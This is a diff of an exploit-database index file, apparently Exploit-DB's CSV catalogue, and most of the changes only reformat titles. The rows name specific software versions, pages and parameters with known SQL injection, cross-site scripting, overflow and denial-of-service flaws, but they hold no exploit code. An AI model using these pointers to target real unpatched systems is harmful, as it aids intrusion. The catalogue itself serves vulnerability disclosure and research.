25425,platforms/asp/webapps/25425.txt,"OneWorldStore OWListProduct.ASP Multiple SQL Injection",2005-04-14,Dcrab,asp,webapps,0 -25426,platforms/asp/webapps/25426.txt,"OneWorldStore OWProductDetail.ASP - SQL Injection",2005-04-14,Dcrab,asp,webapps,0 +25426,platforms/asp/webapps/25426.txt,"OneWorldStore - OWProductDetail.ASP SQL Injection",2005-04-14,Dcrab,asp,webapps,0 25427,platforms/asp/webapps/25427.txt,"OneWorldStore OWContactUs.ASP Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps,0 25428,platforms/asp/webapps/25428.txt,"OneWorldStore OWListProduct.ASP Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps,0 25429,platforms/linux/dos/25429.c,"Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness",2005-04-15,Overflow.pl,linux,dos,0 @@ -22577,7 +22577,7 @@ id,file,description,date,author,platform,type,port 25436,platforms/php/webapps/25436.txt,"eGroupWare 1.0 tts/index.php filter Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 25437,platforms/php/webapps/25437.txt,"eGroupWare 1.0 - index.php cats_app Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps,0 -25439,platforms/multiple/dos/25439.c,"Multiple Vendor TCP Session Acknowledgement Number Denial of Service",2004-12-13,"Antonio M. D. S. Fortes",multiple,dos,0 +25439,platforms/multiple/dos/25439.c,"Multiple Vendor - TCP Session Acknowledgement Number Denial of Service",2004-12-13,"Antonio M. D. S. Fortes",multiple,dos,0 25440,platforms/php/webapps/25440.txt,"WordPress wp-FileManager Plugin - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x? / 2.x / 3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id param) SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 @@ -22603,8 +22603,8 @@ id,file,description,date,author,platform,type,port 25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/Login.ASP SQL Injection",2005-04-20,c0d3r,asp,webapps,0 25467,platforms/php/webapps/25467.txt,"Netref 4.2 Cat_for_gen.php Remote PHP Script Injection",2005-04-20,jaguar,php,webapps,0 25468,platforms/php/webapps/25468.txt,"PHP Labs proFile Dir URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 -25469,platforms/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 Admin Form SQL Injection",2005-04-20,Zinho,php,webapps,0 -25470,platforms/multiple/dos/25470.txt,"Neslo Desktop Rover 3.0 Malformed Packet Remote Denial of Service",2005-04-20,"Adam Baldwin",multiple,dos,0 +25469,platforms/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 - Admin Form SQL Injection",2005-04-20,Zinho,php,webapps,0 +25470,platforms/multiple/dos/25470.txt,"Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service",2005-04-20,"Adam Baldwin",multiple,dos,0 25472,platforms/windows/dos/25472.py,"Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service",2013-05-15,Sapling,windows,dos,0 25473,platforms/php/webapps/25473.txt,"PHP Labs proFile File URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25474,platforms/php/webapps/25474.txt,"PHPBB-Auction Module 1.0/1.2 Auction_Rating.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 @@ -22619,40 +22619,40 @@ id,file,description,date,author,platform,type,port 25483,platforms/asp/webapps/25483.txt,"DUportal 3.1.2 inc_poll_voting.asp DAT_PARENT Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25485,platforms/asp/webapps/25485.txt,"DUportal 3.1.2 type.asp iCat Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 inc_rating.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25486,platforms/windows/remote/25486.txt,"RaidenFTPD 2.4 Unauthorized File Access",2005-04-21,"Lachlan. H",windows,remote,0 +25486,platforms/windows/remote/25486.txt,"RaidenFTPD 2.4 - Unauthorized File Access",2005-04-21,"Lachlan. H",windows,remote,0 25487,platforms/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal",2005-04-21,"Donato Ferrante",windows,remote,0 -25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 Username Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 +25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 - Username Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25489,platforms/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 Ckprvd Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 -25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 AdminShop HDoc Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 -25491,platforms/php/webapps/25491.txt,"ProfitCode Software PayProCart 3.0 AdminShop ModID Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 -25492,platforms/php/webapps/25492.txt,"ProfitCode Software PayProCart 3.0 AdminShop TaskID Cross-Site Scripting",2004-04-21,Lostmon,php,webapps,0 +25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 - AdminShop HDoc Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 +25491,platforms/php/webapps/25491.txt,"ProfitCode Software PayProCart 3.0 - AdminShop ModID Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 +25492,platforms/php/webapps/25492.txt,"ProfitCode Software PayProCart 3.0 - AdminShop TaskID Cross-Site Scripting",2004-04-21,Lostmon,php,webapps,0 25493,platforms/php/webapps/25493.txt,"CKEditor < 4.1WYSIWYG module Drupal 6.x & 7.x - Persistent XSS",2013-05-17,r0ng,php,webapps,0 -25494,platforms/php/webapps/25494.txt,"ProfitCode Software PayProCart 3.0 AdminShop ProMod Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 -25495,platforms/php/webapps/25495.txt,"ProfitCode Software PayProCart 3.0 AdminShop MMActionComm Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 +25494,platforms/php/webapps/25494.txt,"ProfitCode Software PayProCart 3.0 - AdminShop ProMod Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 +25495,platforms/php/webapps/25495.txt,"ProfitCode Software PayProCart 3.0 - AdminShop MMActionComm Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25496,platforms/php/webapps/25496.txt,"php-Charts 1.0 - Code Execution",2013-05-17,"fizzle stick",php,webapps,0 25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 -25498,platforms/asp/webapps/25498.txt,"ASPNuke 0.80 Comments.ASP SQL Injection",2005-04-22,Dcrab,asp,webapps,0 +25498,platforms/asp/webapps/25498.txt,"ASPNuke 0.80 - Comments.ASP SQL Injection",2005-04-22,Dcrab,asp,webapps,0 25499,platforms/linux/dos/25499.py,"nginx 1.3.9-1.4.0 - DoS PoC",2013-05-17,"Mert SARICA",linux,dos,0 -25500,platforms/asp/webapps/25500.txt,"ASPNuke 0.80 Detail.ASP SQL Injection",2005-04-22,Dcrab,asp,webapps,0 -25501,platforms/asp/webapps/25501.txt,"ASPNuke 0.80 Profile.ASP Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 -25502,platforms/asp/webapps/25502.txt,"ASPNuke 0.80 Select.ASP Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 +25500,platforms/asp/webapps/25500.txt,"ASPNuke 0.80 - Detail.ASP SQL Injection",2005-04-22,Dcrab,asp,webapps,0 +25501,platforms/asp/webapps/25501.txt,"ASPNuke 0.80 - Profile.ASP Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 +25502,platforms/asp/webapps/25502.txt,"ASPNuke 0.80 - Select.ASP Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 25503,platforms/php/webapps/25503.txt,"WoltLab Burning Board 2.3.1 Thread.php Cross-Site Scripting",2005-04-22,deluxe89,php,webapps,0 25504,platforms/asp/webapps/25504.txt,"Black Knight Forum 4.0 Member.ASP SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25505,platforms/asp/webapps/25505.txt,"Black Knight Forum 4.0 Forum.ASP SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25506,platforms/asp/webapps/25506.txt,"CartWIZ 1.10 AddToCart.ASP SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25507,platforms/asp/webapps/25507.txt,"CartWIZ 1.10 ProductCatalogSubCats.ASP SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25508,platforms/asp/webapps/25508.txt,"CartWIZ 1.10 ProductDetails.ASP SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25507,platforms/asp/webapps/25507.txt,"CartWIZ 1.10 - ProductCatalogSubCats.ASP SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25508,platforms/asp/webapps/25508.txt,"CartWIZ 1.10 - ProductDetails.ASP SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25509,platforms/asp/webapps/25509.txt,"CartWIZ 1.10 - SearchResults.ASP PriceTo Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25510,platforms/asp/webapps/25510.txt,"CartWIZ 1.10 - SearchResults.ASP PriceFrom Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25511,platforms/asp/webapps/25511.txt,"CartWIZ 1.10 - SearchResults.ASP IDCategory Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 25512,platforms/asp/webapps/25512.txt,"CartWIZ 1.10 TellAFriend.ASP Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25513,platforms/asp/webapps/25513.txt,"CartWIZ 1.10 AddToWishlist.ASP Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25514,platforms/asp/webapps/25514.txt,"CartWIZ 1.10 Access.ASP Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25515,platforms/asp/webapps/25515.txt,"CartWIZ 1.10 Error.ASP Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 +25515,platforms/asp/webapps/25515.txt,"CartWIZ 1.10 - Error.ASP Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25516,platforms/asp/webapps/25516.txt,"CartWIZ 1.10 - Login.ASP Redirect Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25517,platforms/linux/remote/25517.rb,"Mutiny 5 - Arbitrary File Upload",2013-05-17,Metasploit,linux,remote,0 25518,platforms/php/webapps/25518.txt,"Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",php,webapps,0 -25519,platforms/php/webapps/25519.txt,"ZPanel templateparser.class.php - Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 +25519,platforms/php/webapps/25519.txt,"ZPanel - templateparser.class.php Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 - Login.ASP Message Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25521,platforms/asp/webapps/25521.txt,"CartWIZ 1.10 - SearchResults.ASP SKU Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25522,platforms/asp/webapps/25522.txt,"CartWIZ 1.10 - SearchResults.ASP Name Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 @@ -22662,7 +22662,7 @@ id,file,description,date,author,platform,type,port 25526,platforms/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index (2)",2005-04-25,kf,linux,remote,0 25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow",2005-04-25,"Damian Put",linux,dos,0 25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 PMS.php Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0 -25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 Default.ASP Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0 +25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - Default.ASP Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 Set_Lang File Include",2005-04-26,"Max Cerny",php,webapps,0 25532,platforms/php/webapps/25532.txt,"Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 @@ -22671,7 +22671,7 @@ id,file,description,date,author,platform,type,port 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25537,platforms/asp/webapps/25537.txt,"MetaCart E-Shop V-8 StrCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 Error.php Remote File Inclusion",2005-04-26,Kold,php,webapps,0 +25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 - Error.php Remote File Inclusion",2005-04-26,Kold,php,webapps,0 25539,platforms/asp/webapps/25539.txt,"MetaCart2 - IntCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25540,platforms/asp/webapps/25540.txt,"MetaCart2 - StrSubCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25541,platforms/asp/webapps/25541.txt,"MetaCart2 - CurCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 @@ -22705,17 +22705,17 @@ id,file,description,date,author,platform,type,port 25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module Multiple Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 ID Variable SQL Injection",2005-04-30,admin@batznet.com,php,webapps,0 25571,platforms/windows/remote/25571.txt,"video cam server 1.0 - Directory Traversal",2005-05-02,"Donato Ferrante",windows,remote,0 -25572,platforms/windows/remote/25572.txt,"Video Cam Server 1.0 Path Disclosure",2005-05-02,"Donato Ferrante",windows,remote,0 -25573,platforms/windows/remote/25573.txt,"Video Cam Server 1.0 Administrative Interface Authentication Bypass",2005-05-02,"Donato Ferrante",windows,remote,0 +25572,platforms/windows/remote/25572.txt,"Video Cam Server 1.0 - Path Disclosure",2005-05-02,"Donato Ferrante",windows,remote,0 +25573,platforms/windows/remote/25573.txt,"Video Cam Server 1.0 - Administrative Interface Authentication Bypass",2005-05-02,"Donato Ferrante",windows,remote,0 25574,platforms/multiple/remote/25574.txt,"Mtp-Target 1.2.2 Client Remote Format String",2005-05-02,"Luigi Auriemma",multiple,remote,0 25575,platforms/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 basket.php Multiple Parameter XSS",2005-05-02,Lostmon,php,webapps,0 -25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 page.php page Parameter XSS",2005-05-02,Lostmon,php,webapps,0 +25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - page.php page Parameter XSS",2005-05-02,Lostmon,php,webapps,0 25577,platforms/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 reviews.php Multiple Parameter XSS",2005-05-02,Lostmon,php,webapps,0 25578,platforms/php/webapps/25578.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 product_details.php category_id Parameter XSS",2005-05-02,Lostmon,php,webapps,0 25579,platforms/php/webapps/25579.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 products.php Multiple Parameter XSS",2005-05-02,Lostmon,php,webapps,0 25580,platforms/php/webapps/25580.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 news_view.php Multiple Parameter XSS",2005-05-02,Lostmon,php,webapps,0 25720,platforms/php/webapps/25720.txt,"Vanilla Forums 2.0.18.8 - Multiple Vulnerabilities",2013-05-26,"Henry Hoggard",php,webapps,0 -25584,platforms/multiple/dos/25584.txt,"Mtp-Target Server 1.2.2 Memory Corruption",2005-05-02,"Luigi Auriemma",multiple,dos,0 +25584,platforms/multiple/dos/25584.txt,"Mtp-Target Server 1.2.2 - Memory Corruption",2005-05-02,"Luigi Auriemma",multiple,dos,0 25585,platforms/asp/webapps/25585.txt,"MaxWebPortal 1.3 dl_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25586,platforms/asp/webapps/25586.txt,"MaxWebPortal 1.3 links_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25587,platforms/asp/webapps/25587.txt,"MaxWebPortal 1.3 pic_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 @@ -22727,7 +22727,7 @@ id,file,description,date,author,platform,type,port 25593,platforms/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 Act Parameter Cross-Site Scripting",2005-05-03,"arron ward",php,webapps,0 25594,platforms/cgi/webapps/25594.txt,"Gossamer Threads Links 2.x - User.CGI Cross-Site Scripting",2005-05-04,"Nathan House",cgi,webapps,0 25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 Defer.ASP SQL Injection",2005-05-04,Zinho,asp,webapps,0 -25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 Details.ASP SQL Injection",2005-05-04,Zinho,asp,webapps,0 +25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - Details.ASP SQL Injection",2005-05-04,Zinho,asp,webapps,0 25597,platforms/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 - ActiveX Control SRC Information Disclosure",2005-05-04,"Robert Fly",windows,remote,0 25598,platforms/osx/remote/25598.txt,"Apple Mac OS X 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0 25599,platforms/php/webapps/25599.txt,"interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 @@ -22759,7 +22759,7 @@ id,file,description,date,author,platform,type,port 25619,platforms/php/webapps/25619.txt,"MidiCart PHP Item_List.php SecondGroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 25620,platforms/php/webapps/25620.txt,"MidiCart PHP Item_List.php Maingroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,windows,remote,0 -25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 Admin.CGI EntryID Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps,0 +25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - Admin.CGI EntryID Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps,0 25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 OUT.php SQL Injection",2005-05-06,Kold,php,webapps,0 25624,platforms/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)",2005-05-06,"Luca Ercoli",unix,remote,0 25625,platforms/unix/remote/25625.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (2)",2005-05-11,K-sPecial,unix,remote,0 @@ -22780,7 +22780,7 @@ id,file,description,date,author,platform,type,port 25640,platforms/php/webapps/25640.txt,"PWSPHP 1.1/1.2 Profil.php SQL Injection",2005-05-09,"SecuBox fRoGGz",php,webapps,0 25641,platforms/php/webapps/25641.txt,"WowBB 1.6 View_User.php SQL Injection",2005-05-10,Megasky,php,webapps,0 25642,platforms/php/webapps/25642.txt,"NukeET 3.0/3.1 Base64 Codigo Variable Cross-Site Scripting",2005-05-10,"Suko and Lostmon",php,webapps,0 -25643,platforms/windows/remote/25643.txt,"GeoVision Digital Surveillance System 6.0 4/6.1 Unauthorized JPEG Image Access",2005-05-10,"Tirath Rai",windows,remote,0 +25643,platforms/windows/remote/25643.txt,"GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized JPEG Image Access",2005-05-10,"Tirath Rai",windows,remote,0 25644,platforms/php/webapps/25644.txt,"e107 Website System 0.617 Request.php Directory Traversal",2005-05-10,Heintz,php,webapps,0 25645,platforms/php/webapps/25645.txt,"e107 Website System 0.617 Forum_viewforum.php SQL Injection",2005-05-10,Heintz,php,webapps,0 25646,platforms/windows/remote/25646.txt,"MyServer 0.8 - Cross-Site Scripting",2005-05-10,dr_insane,windows,remote,0 @@ -22796,8 +22796,8 @@ id,file,description,date,author,platform,type,port 25656,platforms/php/webapps/25656.txt,"OpenBB 1.0.8 Read.php SQL Injection",2005-05-13,Megasky,php,webapps,0 25657,platforms/php/webapps/25657.txt,"OpenBB 1.0.8 Member.php Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25658,platforms/windows/dos/25658.txt,"Yahoo! Messenger 5.x/6.0 URL Handler Remote Denial of Service",2005-05-13,"Torseq Tech",windows,dos,0 -25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 Start-Page.CSS.php3 - Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 -25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 Style.CSS.php3 - Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 +25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - Start-Page.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 +25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0 25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 25663,platforms/php/webapps/25663.txt,"Shop-Script CategoryID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -22808,7 +22808,7 @@ id,file,description,date,author,platform,type,port 25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 Sigmaweb.DLL SQL Injection",2005-05-16,"mehran gashtasebi",cgi,webapps,0 25669,platforms/linux/remote/25669.txt,"pserv 3.2 - Directory Traversal",2005-05-16,"Claus R. F. Overbeck",linux,remote,0 25670,platforms/multiple/remote/25670.html,"Mozilla Suite And Firefox DOM Property Overrides Code Execution",2005-05-16,moz_bug_r_a4,multiple,remote,0 -25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 comments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 +25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 - comments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 25672,platforms/php/webapps/25672.txt,"NPDS 4.8/5.0 pollcomments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 25673,platforms/php/webapps/25673.txt,"JGS-Portal 3.0.1/3.0.2 jgs_portal_statistik.php year Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 25674,platforms/php/webapps/25674.txt,"JGS-Portal 3.0.1/3.0.2 jgs_portal.php anzahl_beitraege Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 @@ -22824,7 +22824,7 @@ id,file,description,date,author,platform,type,port 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote,0 25685,platforms/jsp/webapps/25685.txt,"Sun JavaMail 1.3 API MimeMessage Infromation Disclosure",2005-05-19,"Ricky Latt",jsp,webapps,0 25686,platforms/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Include",2005-05-19,"Ingvar Gilbert",php,webapps,0 -25687,platforms/freebsd/remote/25687.c,"Picasm 1.10/1.12 Error Generation Remote Buffer Overflow",2005-05-20,"Shaun Colley",freebsd,remote,0 +25687,platforms/freebsd/remote/25687.c,"Picasm 1.10/1.12 - Error Generation Remote Buffer Overflow",2005-05-20,"Shaun Colley",freebsd,remote,0 25688,platforms/linux/local/25688.txt,"Gedit 2.x - Filename Format String",2005-05-30,jsk:exworm,linux,local,0 25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple Index.php Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 25690,platforms/php/webapps/25690.pl,"PortailPHP 1.3 ID Parameter SQL Injection",2005-05-23,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -22847,34 +22847,34 @@ id,file,description,date,author,platform,type,port 25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 Mail Email Header Buffer Overflow",2004-08-10,infamous41md,linux,remote,0 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 -25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 Insecure File Creation",2005-05-26,"Eric Romang",linux,local,0 +25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",linux,local,0 25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - Read_TCP_String Remote Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 25712,platforms/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE",2013-05-26,rgod,windows,dos,0 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE",2013-05-26,rgod,windows,remote,0 25714,platforms/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow",2013-05-26,LiquidWorm,windows,dos,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 -25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 (index.php module param) - Blind SQL Injection Exploit",2013-05-26,mr.pr0n,php,webapps,0 +25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - (index.php module param) Blind SQL Injection Exploit",2013-05-26,mr.pr0n,php,webapps,0 25718,platforms/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local,0 25719,platforms/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,windows,dos,0 25721,platforms/php/webapps/25721.txt,"WordPress User Role Editor Plugin 3.12 - CSRF",2013-05-26,"Henry Hoggard",php,webapps,0 25723,platforms/php/webapps/25723.txt,"WordPress Spider Event Calendar Plugin 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25724,platforms/php/webapps/25724.txt,"WordPress Spider Catalog Plugin 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 -25725,platforms/windows/local/25725.rb,"AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-26,Metasploit,windows,local,0 -25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 (menager.php playlist_id param) - SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 -25727,platforms/php/webapps/25727.txt,"BookReview 1.0 add_review.htm Multiple Parameter XSS",2005-05-26,Lostmon,php,webapps,0 -25728,platforms/php/webapps/25728.txt,"BookReview 1.0 add_contents.htm Multiple Parameter XSS",2005-05-26,Lostmon,php,webapps,0 +25725,platforms/windows/local/25725.rb,"AdobeCollabSync - Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-26,Metasploit,windows,local,0 +25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - (menager.php playlist_id param) SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 +25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - add_review.htm Multiple Parameter XSS",2005-05-26,Lostmon,php,webapps,0 +25728,platforms/php/webapps/25728.txt,"BookReview 1.0 - add_contents.htm Multiple Parameter XSS",2005-05-26,Lostmon,php,webapps,0 25729,platforms/php/webapps/25729.txt,"BookReview 1.0 suggest_category.htm node Parameter XSS",2005-05-26,Lostmon,php,webapps,0 -25730,platforms/php/webapps/25730.txt,"BookReview 1.0 contact.htm user Parameter XSS",2005-05-26,Lostmon,php,webapps,0 